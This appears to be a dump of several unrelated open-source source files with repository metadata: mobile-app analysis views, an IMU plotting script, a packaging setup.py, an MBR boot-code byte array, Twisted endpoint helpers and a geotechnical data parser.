python_list(db_entry[0].ATS_ANALYSIS), 'binary_analysis': python_list(db_entry[0].BINARY_ANALYSIS), 'macho_analysis': python_dict(db_entry[0].MACHO_ANALYSIS), 'ios_api': python_dict(db_entry[0].IOS_API), 'code_analysis': python_dict(db_entry[0].CODE_ANALYSIS), 'file_analysis': python_list(db_entry[0].FILE_ANALYSIS), 'libraries': python_list(db_entry[0].LIBRARIES), 'files': python_list(db_entry[0].FILES), 'urls': python_list(db_entry[0].URLS), 'domains': python_dict(db_entry[0].DOMAINS), 'emails': python_list(db_entry[0].EMAILS), 'strings': python_list(db_entry[0].STRINGS), 'firebase_urls': python_list(db_entry[0].FIREBASE_URLS), 'appstore_details': python_dict(db_entry[0].APPSTORE_DETAILS), } return context except Exception: logger.exception('Fetching from DB') def get_context_from_analysis(app_dict, info_dict, code_dict, bin_dict, all_files): """Get the context for IPA/ZIP from analysis results.""" try: context = { 'version': settings.MOBSF_VER, 'title': 'Static Analysis', 'file_name': app_dict['file_name'], 'app_name': info_dict['bin_name'], 'app_type': bin_dict['bin_type'], 'size': app_dict['size'], 'md5': app_dict['md5_hash'], 'sha1': app_dict['sha1'], 'sha256': app_dict['sha256'], 'build': info_dict['build'], 'app_version': info_dict['bundle_version_name'], 'sdk_name': info_dict['sdk'], 'platform': info_dict['pltfm'], 'min_os_version': info_dict['min'], 'bundle_id': info_dict['id'], 'bundle_url_types': info_dict['bundle_url_types'], 'bundle_supported_platforms': info_dict['bundle_supported_platforms'], 'icon_found': app_dict['icon_found'], 'info_plist': info_dict['plist_xml'], 'binary_info': bin_dict['bin_info'], 'permissions': info_dict['permissions'], 'ats_analysis': info_dict['inseccon'], 'binary_analysis': bin_dict['bin_code_analysis'], 'macho_analysis': bin_dict['checksec'], 'ios_api': code_dict['api'], 'code_analysis': code_dict['code_anal'], 'file_analysis': all_files['special_files'], 'libraries': bin_dict['libraries'], 'files': all_files['files_short'], 'urls': code_dict['urlnfile'], 'domains': code_dict['domains'], 'emails': code_dict['emailnfile'], 'strings': bin_dict['strings'], 'firebase_urls': code_dict['firebase'], 'appstore_details': app_dict['appstore'], } return context except Exception: logger.exception('Rendering to Template') def save_or_update(update_type, app_dict, info_dict, code_dict, bin_dict, all_files): """Save/Update an IPA/ZIP DB entry.""" try: values = { 'FILE_NAME': app_dict['file_name'], 'APP_NAME': info_dict['bin_name'], 'APP_TYPE': bin_dict['bin_type'], 'SIZE': app_dict['size'], 'MD5': app_dict['md5_hash'], 'SHA1': app_dict['sha1'], 'SHA256': app_dict['sha256'], 'BUILD': info_dict['build'], 'APP_VERSION': info_dict['bundle_version_name'], 'SDK_NAME': info_dict['sdk'], 'PLATFORM': info_dict['pltfm'], 'MIN_OS_VERSION': info_dict['min'], 'BUNDLE_ID': info_dict['id'], 'BUNDLE_URL_TYPES': info_dict['bundle_url_types'], 'BUNDLE_SUPPORTED_PLATFORMS': info_dict['bundle_supported_platforms'], 'ICON_FOUND': app_dict['icon_found'], 'INFO_PLIST': info_dict['plist_xml'], 'BINARY_INFO': bin_dict['bin_info'], 'PERMISSIONS': info_dict['permissions'], 'ATS_ANALYSIS': info_dict['inseccon'], 'BINARY_ANALYSIS': bin_dict['bin_code_analysis'], 'MACHO_ANALYSIS': bin_dict['checksec'], 'IOS_API': code_dict['api'], 'CODE_ANALYSIS': code_dict['code_anal'], 'FILE_ANALYSIS': all_files['special_files'], 'LIBRARIES': bin_dict['libraries'], 'FILES': all_files['files_short'], 'URLS': code_dict['urlnfile'], 'DOMAINS': code_dict['domains'], 'EMAILS': code_dict['emailnfile'], 'STRINGS': bin_dict['strings'], 'FIREBASE_URLS': code_dict['firebase'], 'APPSTORE_DETAILS': app_dict['appstore'], } if update_type == 'save': db_entry = StaticAnalyzerIOS.objects.filter( MD5=app_dict['md5_hash']) if not db_entry.exists(): StaticAnalyzerIOS.objects.create(**values) else: StaticAnalyzerIOS.objects.filter( MD5=app_dict['md5_hash']).update(**values) except Exception: logger.exception('Updating DB') try: values = { 'APP_NAME': info_dict['bin_name'], 'PACKAGE_NAME': info_dict['id'], 'VERSION_NAME': info_dict['bundle_version_name'], } RecentScansDB.objects.filter( MD5=app_dict['md5_hash']).update(**values) except Exception: logger.exception('Updating RecentScansDB')
gpl-3.0
-1,673,612,552,239,371,300
41.316092
77
0.528317
false
Shatki/PyIMU
test/magnetosphere.py
1
1580
from mpl_toolkits.mplot3d import axes3d import numpy as np import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation from socket import * import time # Объявляем все глобальные переменные HOST = '192.168.0.76' PORT = 21566 BUFSIZ = 512 ADDR = (HOST, PORT) bad_packet = 0 good_packet = 0 # fig, ax = plt.subplots() fig = plt.figure() ax = fig.add_subplot(111, projection='3d') # Socket # tcpCliSock = socket(AF_INET, SOCK_STREAM) # tcpCliSock.connect(ADDR) # Запрет на ожидание plt.ion() tstart = time.time() # real-time plotting loop X, Y, Z = [], [], [] while True: try: # читаем данные из сети tcpCliSock.c data = tcpCliSock.recv(BUFSIZ) if data: print(len(X), data) data = data.decode().split(',') if len(data) == 9: # print('Data received', data) # tcpCliSock.send(b'Ok') good_packet += 1 else: bad_packet += 1 # читаем данные из сети data = tcpCliSock.recv(BUFSIZ) X.append(data[0]) Y.append(data[1]) Z.append(data[2]) frame = ax.scatter(X, Y, Z, c='b', marker='o') # Remove old line collection before drawing #if oldcol is not None: # ax.collections.remove(oldcol) plt.pause(0.001 / len(X)) except KeyboardInterrupt: tcpCliSock.close() print('FPS: %f' % (len(X) / (time.time() - tstart))) break
gpl-3.0
-736,870,472,682,010,900
21.328358
60
0.574866
false
embray/astropy_helpers
setup.py
1
2069
#!/usr/bin/env python # Licensed under a 3-clause BSD style license - see LICENSE.rst import ah_bootstrap import pkg_resources from setuptools import setup from astropy_helpers.setup_helpers import register_commands, get_package_info from astropy_helpers.version_helpers import generate_version_py NAME = 'astropy_helpers' VERSION = '1.1.dev' RELEASE = 'dev' not in VERSION DOWNLOAD_BASE_URL = 'http://pypi.python.org/packages/source/a/astropy-helpers' generate_version_py(NAME, VERSION, RELEASE, False, uses_git=not RELEASE) # Use the updated version including the git rev count from astropy_helpers.version import version as VERSION cmdclass = register_commands(NAME, VERSION, RELEASE) # This package actually doesn't use the Astropy test command del cmdclass['test'] setup( name=pkg_resources.safe_name(NAME), # astropy_helpers -> astropy-helpers version=VERSION, description='Utilities for building and installing Astropy, Astropy ' 'affiliated packages, and their respective documentation.', author='The Astropy Developers', author_email='[email protected]', license='BSD', url='http://astropy.org', long_description=open('README.rst').read(), download_url='{0}/astropy-helpers-{1}.tar.gz'.format(DOWNLOAD_BASE_URL, VERSION), classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'Framework :: Setuptools Plugin', 'Framework :: Sphinx :: Extension', 'Framework :: Sphinx :: Theme', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Topic :: Software Development :: Build Tools', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: System :: Archiving :: Packaging' ], cmdclass=cmdclass, zip_safe=False, **get_package_info(exclude=['astropy_helpers.tests']) )
bsd-3-clause
1,800,023,496,086,649,600
38.037736
78
0.672789
false
0xGiddi/pymbr
pymbr/bootcode.py
1
1582
""" pymbr A python module to manipulate and create MBRs. :copyright: (c) 2017 by Gideon S. (0xGiddi) :license: GPLv3, see LICENSE file for more details. """ __all__ = ['Bootcode'] class Bootcode: """ Common bootcodes used by various OSes """ ZERO = [0x00] ZOIDBERG = [0xB8, 0xC0, 0x07, 0x05, 0x20, 0x01, 0x8E, 0xD0, 0xBC, 0x00, 0x10, 0xB8, 0xC0, 0x07, 0x8E, 0xD8, 0xE8, 0x8E, 0x00, 0xE8, 0xA3, 0x00, 0xBE, 0x2A, 0x00, 0xE8, 0x70, 0x00, 0xBE, 0x45, 0x00, 0xE8, 0x6A, 0x00, 0xBE, 0x6B, 0x00, 0xE8, 0x64, 0x00, 0xEB, 0xFE, 0x4E, 0x65, 0x65, 0x64, 0x20, 0x4D, 0x42, 0x52, 0x20, 0x70, 0x61, 0x72, 0x73, 0x69, 0x6E, 0x67, 0x20, 0x6D, 0x6F, 0x64, 0x75, 0x6C, 0x65, 0x3F, 0x0A, 0x0D, 0x00, 0x57, 0x68, 0x79, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x5A, 0x6F, 0x69, 0x64, 0x62, 0x65, 0x72, 0x67, 0x3F, 0x20, 0x28, 0x56, 0x56, 0x29, 0x28, 0xA7, 0x2C, 0x2C, 0x2C, 0xA7, 0x29, 0x28, 0x56, 0x56, 0x29, 0x0A, 0x0D, 0x0A, 0x0D, 0x00, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x30, 0x78, 0x47, 0x69, 0x64, 0x64, 0x69, 0x2F, 0x70, 0x79, 0x6D, 0x62, 0x72, 0x00, 0xB4, 0x0E, 0xAC, 0x3C, 0x00, 0x74, 0x04, 0xCD, 0x10, 0xEB, 0xF7, 0xC3, 0x60, 0xB7, 0x00, 0xB4, 0x02, 0xCD, 0x10, 0x61, 0xC3, 0x60, 0xBA, 0x00, 0x00, 0xE8, 0xF0, 0xFF, 0xB4, 0x06, 0xB0, 0x00, 0xB7, 0x0C, 0xB9, 0x00, 0x00, 0xB6, 0x18, 0xB2, 0x4F, 0xCD, 0x10, 0x61, 0xC3, 0x60, 0xB5, 0x20, 0xB4, 0x01, 0xB0, 0x03, 0xCD, 0x10, 0x61, 0xC3] # TODO: Add here popular OSes MBRs
gpl-3.0
-8,665,105,640,867,427,000
51.733333
108
0.628951
false
GoodgameStudios/crossbar
crossbar/twisted/endpoint.py
1
12193
##################################################################################### # # Copyright (C) Tavendo GmbH # # Unless a separate license agreement exists between you and Tavendo GmbH (e.g. you # have purchased a commercial license), the license terms below apply. # # Should you enter into a separate license agreement after having received a copy of # this software, then the terms of such license agreement replace the terms below at # the time at which such license agreement becomes effective. # # In case a separate license agreement ends, and such agreement ends without being # replaced by another separate license agreement, the license terms below apply # from the time at which said agreement ends. # # LICENSE TERMS # # This program is free software: you can redistribute it and/or modify it under the # terms of the GNU Affero General Public License, version 3, as published by the # Free Software Foundation. This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # See the GNU Affero General Public License Version 3 for more details. # # You should have received a copy of the GNU Affero General Public license along # with this program. If not, see <http://www.gnu.org/licenses/agpl-3.0.en.html>. # ##################################################################################### from __future__ import absolute_import import os from twisted.internet import defer from twisted.internet.endpoints import TCP4ServerEndpoint, \ TCP6ServerEndpoint, \ TCP4ClientEndpoint, \ TCP6ClientEndpoint, \ UNIXServerEndpoint, \ UNIXClientEndpoint from twisted.python.compat import unicode try: from twisted.internet.endpoints import SSL4ServerEndpoint, \ SSL4ClientEndpoint from crossbar.twisted.tlsctx import TlsServerContextFactory, \ TlsClientContextFactory except ImportError: _HAS_TLS = False else: _HAS_TLS = True from crossbar.twisted.sharedport import SharedPort __all__ = ('create_listening_endpoint_from_config', 'create_listening_port_from_config', 'create_connecting_endpoint_from_config', 'create_connecting_port_from_config') def create_listening_endpoint_from_config(config, cbdir, reactor): """ Create a Twisted stream server endpoint from a Crossbar.io transport configuration. See: https://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IStreamServerEndpoint.html :param config: The transport configuration. :type config: dict :param cbdir: Crossbar.io node directory (we need this for TLS key/certificates). :type cbdir: str :param reactor: The reactor to use for endpoint creation. :type reactor: obj :returns obj -- An instance implementing IStreamServerEndpoint """ endpoint = None # a TCP endpoint # if config['type'] == 'tcp': # the TCP protocol version (v4 or v6) # version = int(config.get('version', 4)) # the listening port # if type(config['port']) in (str, unicode): # read port from environment variable .. try: port = int(os.environ[config['port'][1:]]) except Exception as e: print("Could not read listening port from env var: {}".format(e)) raise e else: port = config['port'] # the listening interface # interface = str(config.get('interface', '').strip()) # the TCP accept queue depth # backlog = int(config.get('backlog', 50)) if 'tls' in config: if _HAS_TLS: key_filepath = os.path.abspath(os.path.join(cbdir, config['tls']['key'])) cert_filepath = os.path.abspath(os.path.join(cbdir, config['tls']['certificate'])) with open(key_filepath) as key_file: with open(cert_filepath) as cert_file: if 'dhparam' in config['tls']: dhparam_filepath = os.path.abspath(os.path.join(cbdir, config['tls']['dhparam'])) else: dhparam_filepath = None # create a TLS context factory # key = key_file.read() cert = cert_file.read() ciphers = config['tls'].get('ciphers', None) ctx = TlsServerContextFactory(key, cert, ciphers=ciphers, dhParamFilename=dhparam_filepath) # create a TLS server endpoint # if version == 4: endpoint = SSL4ServerEndpoint(reactor, port, ctx, backlog=backlog, interface=interface) elif version == 6: raise Exception("TLS on IPv6 not implemented") else: raise Exception("invalid TCP protocol version {}".format(version)) else: raise Exception("TLS transport requested, but TLS packages not available") else: # create a non-TLS server endpoint # if version == 4: endpoint = TCP4ServerEndpoint(reactor, port, backlog=backlog, interface=interface) elif version == 6: endpoint = TCP6ServerEndpoint(reactor, port, backlog=backlog, interface=interface) else: raise Exception("invalid TCP protocol version {}".format(version)) # a Unix Domain Socket endpoint # elif config['type'] == 'unix': # the accept queue depth # backlog = int(config.get('backlog', 50)) # the path # path = os.path.abspath(os.path.join(cbdir, config['path'])) # create the endpoint # endpoint = UNIXServerEndpoint(reactor, path, backlog=backlog) else: raise Exception("invalid endpoint type '{}'".format(config['type'])) return endpoint def create_listening_port_from_config(config, factory, cbdir, reactor): """ Create a Twisted listening port from a Crossbar.io transport configuration. See: https://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IListeningPort.html :param config: The transport configuration. :type config: dict :param factory: The transport factory to use (a provider of IProtocolFactory). :type factory: obj :param cbdir: Crossbar.io node directory (we need this for TLS key/certificates). :type cbdir: str :param reactor: The reactor to use for endpoint creation. :type reactor: obj :returns obj -- A Deferred that results in an IListeningPort or an CannotListenError """ if config['type'] == 'tcp' and config.get('shared', False): # the TCP protocol version (v4 or v6) # FIXME: handle v6 # version = int(config.get('version', 4)) # the listening port # port = int(config['port']) # the listening interface # interface = str(config.get('interface', '').strip()) # the TCP accept queue depth # backlog = int(config.get('backlog', 50)) listening_port = SharedPort(port, factory, backlog, interface, reactor, shared=True) try: listening_port.startListening() return defer.succeed(listening_port) except Exception as e: return defer.fail(e) else: endpoint = create_listening_endpoint_from_config(config, cbdir, reactor) return endpoint.listen(factory) def create_connecting_endpoint_from_config(config, cbdir, reactor): """ Create a Twisted stream client endpoint from a Crossbar.io transport configuration. See: https://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IStreamClientEndpoint.html :param config: The transport configuration. :type config: dict :param cbdir: Crossbar.io node directory (we need this for Unix domain socket paths and TLS key/certificates). :type cbdir: str :param reactor: The reactor to use for endpoint creation. :type reactor: obj :returns obj -- An instance implementing IStreamClientEndpoint """ endpoint = None # a TCP endpoint # if config['type'] == 'tcp': # the TCP protocol version (v4 or v6) # version = int(config.get('version', 4)) # the host to connect to # host = str(config['host']) # the port to connect to # port = int(config['port']) # connection timeout in seconds # timeout = int(config.get('timeout', 10)) if 'tls' in config: if _HAS_TLS: ctx = TlsClientContextFactory() # create a TLS client endpoint # if version == 4: endpoint = SSL4ClientEndpoint(reactor, host, port, ctx, timeout=timeout) elif version == 6: raise Exception("TLS on IPv6 not implemented") else: raise Exception("invalid TCP protocol version {}".format(version)) else: raise Exception("TLS transport requested, but TLS packages not available") else: # create a non-TLS client endpoint # if version == 4: endpoint = TCP4ClientEndpoint(reactor, host, port, timeout=timeout) elif version == 6: endpoint = TCP6ClientEndpoint(reactor, host, port, timeout=timeout) else: raise Exception("invalid TCP protocol version {}".format(version)) # a Unix Domain Socket endpoint # elif config['type'] == 'unix': # the path # path = os.path.abspath(os.path.join(cbdir, config['path'])) # connection timeout in seconds # timeout = int(config.get('timeout', 10)) # create the endpoint # endpoint = UNIXClientEndpoint(reactor, path, timeout=timeout) else: raise Exception("invalid endpoint type '{}'".format(config['type'])) return endpoint def create_connecting_port_from_config(config, factory, cbdir, reactor): """ Create a Twisted connecting port from a Crossbar.io transport configuration. See: https://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IListeningPort.html :param config: The transport configuration. :type config: dict :param factory: The transport factory to use (a provider of IProtocolFactory). :type factory: obj :param cbdir: Crossbar.io node directory (we need this for Unix domain socket paths and TLS key/certificates). :type cbdir: str :param reactor: The reactor to use for endpoint creation. :type reactor: obj :returns obj -- A Deferred that results in an IProtocol upon successful connection otherwise a ConnectError """ endpoint = create_connecting_endpoint_from_config(config, cbdir, reactor) return endpoint.connect(factory)
agpl-3.0
7,831,824,093,298,299,000
34.444767
115
0.567129
false
lainegates/DDA
loadDataTools.py
1
41566
# coding=gbk #*************************************************************************** #* * #* Copyright (c) 2009, 2010 * #* Xiaolong Cheng <[email protected]> * #* * #* This program is free software; you can redistribute it and/or modify * #* it under the terms of the GNU Lesser General Public License (LGPL) * #* as published by the Free Software Foundation; either version 2 of * #* the License, or (at your option) any later version. * #* for detail see the LICENCE text file. * #* * #* This program is distributed in the hope that it will be useful, * #* but WITHOUT ANY WARRANTY; without even the implied warranty of * #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * #* GNU Library General Public License for more details. * #* * #* You should have received a copy of the GNU Library General Public * #* License along with this program; if not, write to the Free Software * #* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * #* USA * #* * #*************************************************************************** import FreeCADGui from PyQt4 import QtCore , QtGui import Base from Base import showErrorMessageBox import DDADatabase def checkFileExists(path): import os if not os.path.isfile(path): showErrorMessageBox("FileError" , "File \"%s\" doesn't exist"%path) return False return True class FileReader(): ''' read files , this class will omit the blank lines ''' def __init__(self): self.__fileName = None self.__file = None def setFile(self, fileName): self.__fileName = fileName try: self.__file = open(self.__fileName , 'rb') except: showErrorMessageBox('file open error' , fileName + ' open failed') return False return True def getNextLine(self): line = self.__file.readline() while len(line)!=0: line = line.strip() if len(line)==0: # blank line with '\n' line = self.__file.readline() else: break # this line is not blank if len(line)==0: # file already ends import Base Base.showErrorMessageBox('file error' , 'unvalid data') raise return line def closeFile(self): self.__file.close() class Block: def __init__(self): self.blockIndex = 0 # the index of this block self.startNo = 0 self.endNo = 0 self.vertices = [] self.parameters = [] self.stressX = 0 self.stressY = 0 self.stressXY = 0 self.materialNo = 0 # used in dc result # count how many hole points are on this block self.holePointsCount = 0 def getPoints(self): return [(t[1],t[2],0) for t in self.vertices] def visible(self): if self.holePointsCount>0: return False elif self.holePointsCount==0: return True else : raise Exception('unvalid value %f'% self.holePointsCount) class DDALine: def __init__(self , p1 , p2 , materialNo): self.startPoint = p1 self.endPoint = p2 self.materialNo = materialNo self.visible = True class BoltElement(DDALine): def __init__(self , p1 , p2 , e , t , f): DDALine.__init__(self, p1, p2, 0) self.e = e self.t = t self.f = f class DDAPolyLine: def __init__(self , pts , materialNo): self.pts = pts self.materialNo = materialNo self.visible = True class DDAPoint: def __init__(self , x=0 , y=0): self.x = x self.y = y self.Xspeed = 0 self.Yspeed = 0 self.blockNo = 0 self.visible = True class FixedPoint(DDAPoint): pass class LoadingPoint(DDAPoint): pass class MeasuredPoint(DDAPoint): def __init__(self): DDAPoint.__init__(self) self.u = 0 self.v = 0 self.r = 0 self.stressX = 0 self.stressY = 0 self.stressXY = 0 class HolePoint(DDAPoint): pass class Graph: def __init__(self): self.blocks = [] self.fixedPoints = [] self.measuredPoints = [] self.loadingPoints = [] self.holePoints = [] self.boltElements = [] def reset(self): self.blocks = [] self.fixedPoints = [] self.measuredPoints = [] self.loadingPoints = [] self.boltElements = [] class BaseParseData(): ''' parse data loaded , data may be DL data , DC data etc. ''' def parse(self , filename): ''' abstract function , overwrited by subclass ''' pass def parseFloatNum(self , numStr , itemName='None'): try: num = float(numStr) except: try: num = int(numStr) except: showErrorMessageBox( 'InputError' , itemName + ' should be a float number') return None return num def parseIntNum(self , numStr , itemName='None'): try: num = int(numStr) except: showErrorMessageBox( 'InputError' , itemName + ' should be a integer') return None return num class ParseAndLoadDLData(BaseParseData): ''' parse DL data ''' def __init__(self): self.reset() self.__fileReader = FileReader() def GetResources(self): return { 'Pixmap' : 'LoadDLInput', 'MenuText': 'LoadDCInputData', 'ToolTip': "Load DC Input Data"} def Activated(self): from Base import __currentProjectPath__ if self.parse(__currentProjectPath__ + '/data.dl'): self.save2Database() import Base Base.changeStep4Stage('ShapesAvailable') def reset(self): self.checkStatus = False self.__miniLength = 0 self.__jointSetNum = 0 self.__boundaryNodeNum = 0 self.__tunnelNum = 0 self.__addtionalLineNum = 0 self.__materialLineNum = 0 self.__boltElementNum = 0 self.__fixedPointNum = 0 self.__loadingPointNum = 0 self.__measuredPointNum = 0 self.__holePointNum = 0 self.__jointSets = [] self.__slope = [] self.__boundaryNodes = [] self.__tunnels = [] self.__additionalLines = [] self.__materialLines = [] self.__boltElements = [] self.__fixedPoints = [] self.__loadingPoints = [] self.__measuredPoints = [] self.__holePoints = [] def parse(self , filename ): ''' parse DL data :param filename: the data file name ''' self.reset() if not self.__fileReader.setFile(filename): return False if not self.__parsePandect(): return False if not self.__parseJointSets(): return False if not self.__parseBoundaryNodes(): return False if not self.__parseTunnels(): return False if not self.__parseLines(): return False if not self.__parsePoints(): return False self.__fileReader.closeFile() return True def __parseJointSets(self): ''' parse joint sets ''' # joint dip , dip direction for i in range(self.__jointSetNum): self.__jointSets.append(range(6)) tmpNums = self.__jointSets[-1] str = self.__fileReader.getNextLine() nums = str.strip().split() tmpNums[0] = self.parseFloatNum(nums[0], 'joint dip') tmpNums[1] = self.parseFloatNum(nums[1], 'dip direction') if tmpNums[0] == None or tmpNums[1] == None : return False print 'joint %d : ( %f , %f)'%( i , tmpNums[0],tmpNums[1]) # slope dip , dip direction tmpNumbers = [0 , 1] str = self.__fileReader.getNextLine() nums = str.strip().split() tmpNumbers[0] = self.parseFloatNum(nums[0], 'slope dip') tmpNumbers[1] = self.parseFloatNum(nums[1], 'dip direction') if tmpNumbers[0] == None or tmpNumbers[1] == None : return False print 'slope : ( %f , %f)'%(tmpNumbers[0],tmpNumbers[1]) self.__slope.append((tmpNumbers[0],tmpNumbers[1])) for i in range(self.__jointSetNum): tmpNums = self.__jointSets[i] str = self.__fileReader.getNextLine() nums = str.strip().split() tmpNums[2] = self.parseFloatNum(nums[0], 'spacing') tmpNums[3] = self.parseFloatNum(nums[1], 'length') tmpNums[4] = self.parseFloatNum(nums[2], 'bridge') tmpNums[5] = self.parseFloatNum(nums[3], 'random') if tmpNums[2] == None or tmpNums[3] == None or tmpNums[4] == None or tmpNums[5] == None : return False print 'joint %d parameter : ( %f , %f , %f , %f)'%(i , tmpNums[2],tmpNums[3],tmpNums[4],tmpNums[5]) return True def __parseBoundaryNodes(self ): ''' parse boundary nodes ''' for i in range(self.__boundaryNodeNum): str = self.__fileReader.getNextLine() nums = str.strip().split() tmpNums = [0 , 1 , 0] tmpNums[0] = self.parseFloatNum(nums[0], 'coordinate number') tmpNums[1] = self.parseFloatNum(nums[1], 'coordinate number') if tmpNums[0] == None or tmpNums[1] == None : return False print 'boundary line %d : (%f , %f)'%(i , tmpNums[0] , tmpNums[1]) self.__boundaryNodes.append(tmpNums) return True def __parseTunnels(self ): ''' parse tunnels ''' for i in range(self.__tunnelNum): # tunnel shape number str = self.__fileReader.getNextLine() shapeNo = self.parseIntNum(str, 'tunnel shape number') if shapeNo == None : return False # tunnel a b c r tmpNums = range(4) str = self.__fileReader.getNextLine() names = ['a' , 'b' , 'c' , 'r'] nums = str.strip().split() for j in range(4): tmpNums[j] = self.parseFloatNum(nums[j], 'tunnel ' +names[j]) if tmpNums[j] == None : return False # tunnel center center = [0 , 1] str = self.__fileReader.getNextLine() nums = str.strip().split() for j in range(2): center[j] = self.parseFloatNum(nums[j], 'tunnel center number') if center[j] == None : return False print 'tunnel %d : (%f , %f , %f , %f , %f , %f , %f)'%(i , shapeNo , tmpNums[0] , tmpNums[1] , tmpNums[2] , tmpNums[3] , center[0] , center[1]) self.__tunnels.append((shapeNo , tmpNums[0] , tmpNums[1] , tmpNums[2] , tmpNums[3] , center[0] , center[1])) return True def __parseLines(self ): ''' parse material lines , addtional lines ''' tmpNums = range(4) # additional line for i in range(self.__addtionalLineNum): str = self.__fileReader.getNextLine() nums = str.strip().split() for j in range(4): tmpNums[j] = self.parseFloatNum(nums[j], 'additional line coordinate number') if tmpNums[j] == None : return False materialNo = self.parseFloatNum(nums[4], 'additional line material number') if materialNo == None : return False print 'additional line %d :(%f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo) self.__additionalLines.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo)) # material line for i in range(self.__materialLineNum): str = self.__fileReader.getNextLine() nums = str.strip().split() for j in range(4): tmpNums[j] = self.parseFloatNum(nums[j], 'material line coordinate number') if tmpNums[j] == None : return False materialNo = self.parseFloatNum(nums[4], 'block material number') if materialNo == None : return False print 'block material %d :(%f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo) self.__materialLines.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo)) # bolt elements for i in range(self.__boltElementNum): str = self.__fileReader.getNextLine() nums = str.strip().split() for j in range(4): tmpNums[j] = self.parseFloatNum(nums[j], 'bolt element coordinate number') if tmpNums[j] == None : return False e0 = self.parseFloatNum(nums[4], 'bolt element e0') t0 = self.parseFloatNum(nums[5], 'bolt element t0') f0 = self.parseFloatNum(nums[6], 'bolt element f0') if materialNo == None : return False print 'block material %d :(%f , %f , %f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0) self.__boltElements.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0)) return True def __parsePoints(self): ''' parse points , fixed points , loading points , measured points , hole points :param file: input dl file ''' tmpNums = range(4) # fixed points for i in range(self.__fixedPointNum): str = self.__fileReader.getNextLine() nums = str.strip().split() for j in range(4): tmpNums[j] = self.parseFloatNum(nums[j], 'fixed point coordinate number') if tmpNums[j] == None : return False print 'fixed line %d : (%f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3]) self.__fixedPoints.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3])) # measured points itemNames = ['loading point' , 'measured point' , 'hole point'] realNums = [self.__loadingPointNum , self.__measuredPointNum , self.__holePointNum] for k in range(len(itemNames)): for i in range(realNums[k]): str = self.__fileReader.getNextLine() nums = str.strip().split() for j in range(2): tmpNums[j] = self.parseFloatNum(nums[j], itemNames[k] +' coordinate number') if tmpNums[j] == None : return False print '%s %d : (%f , %f)'%(itemNames[k] , i , tmpNums[0] , tmpNums[1]) if k==0 : self.__loadingPoints.append((tmpNums[0] , tmpNums[1])) elif k==1 : self.__measuredPoints.append((tmpNums[0] , tmpNums[1])) elif k==2 : self.__holePoints.append((tmpNums[0] , tmpNums[1])) return True def __parsePandect(self): ''' parse Numbers , for example , number of joint set ''' self.__miniLength = self.parseFloatNum(self.__fileReader.getNextLine(), 'minimun edge length') if self.__miniLength == None : return False self.__jointSetNum = self.parseIntNum(self.__fileReader.getNextLine(), 'joint set number') if self.__jointSetNum == None: return False self.__boundaryNodeNum = self.parseIntNum(self.__fileReader.getNextLine(), 'boundary line number') if self.__boundaryNodeNum == None: return False self.__tunnelNum = self.parseIntNum(self.__fileReader.getNextLine(), 'tunnel number') if self.__tunnelNum == None: return False self.__addtionalLineNum = self.parseIntNum(self.__fileReader.getNextLine(), 'additional line number') if self.__addtionalLineNum == None: return False self.__materialLineNum = self.parseIntNum(self.__fileReader.getNextLine(), 'material line number') if self.__materialLineNum == None: return False self.__boltElementNum = self.parseIntNum(self.__fileReader.getNextLine(), 'bolt element number') if self.__boltElementNum == None: return False self.__fixedPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'fixed point number') if self.__fixedPointNum == None: return False self.__loadingPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'loading point number') if self.__loadingPointNum == None: return False self.__measuredPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'measured point number') if self.__measuredPointNum == None: return False self.__holePointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'hole point number') if self.__holePointNum == None: return False return True def save2Database(self): ''' save data to DDADatabase.dl_database ''' from DDAShapes import DDAJointSets , DDATunnels DDADatabase.dl_database = DDADatabase.DLDatabase() database = DDADatabase.dl_database database.jointSets = self.__jointSets DDAJointSets.dataTable.refreshData(database.jointSets) database.slope = self.__slope DDAJointSets.slopeDataTable.refreshData(database.slope) database.tunnels = self.__tunnels DDATunnels.dataTable.refreshData(database.tunnels) # boundaryNodes pts = [tuple(p) for p in self.__boundaryNodes] pts.append(pts[0]) database.boundaryNodes = [DDAPolyLine( pts, 1)] # additional lines database.additionalLines = \ [DDALine((p[0],p[1],0) , (p[2],p[3],0) , p[4]) for p in self.__additionalLines] # material line database.materialLines = \ [DDALine((p[0],p[1],0) , (p[2],p[3],0) , p[4]) for p in self.__materialLines] # bolt element database.boltElements = \ [BoltElement((p[0],p[1],0) , (p[2],p[3],0) , p[4] , p[5] , p[6]) for p in self.__boltElements] # points database.fixedPoints = [DDAPoint(t[0],t[1]) for t in self.__fixedPoints] database.loadingPoints = [DDAPoint(t[0],t[1]) for t in self.__loadingPoints] database.measuredPoints = 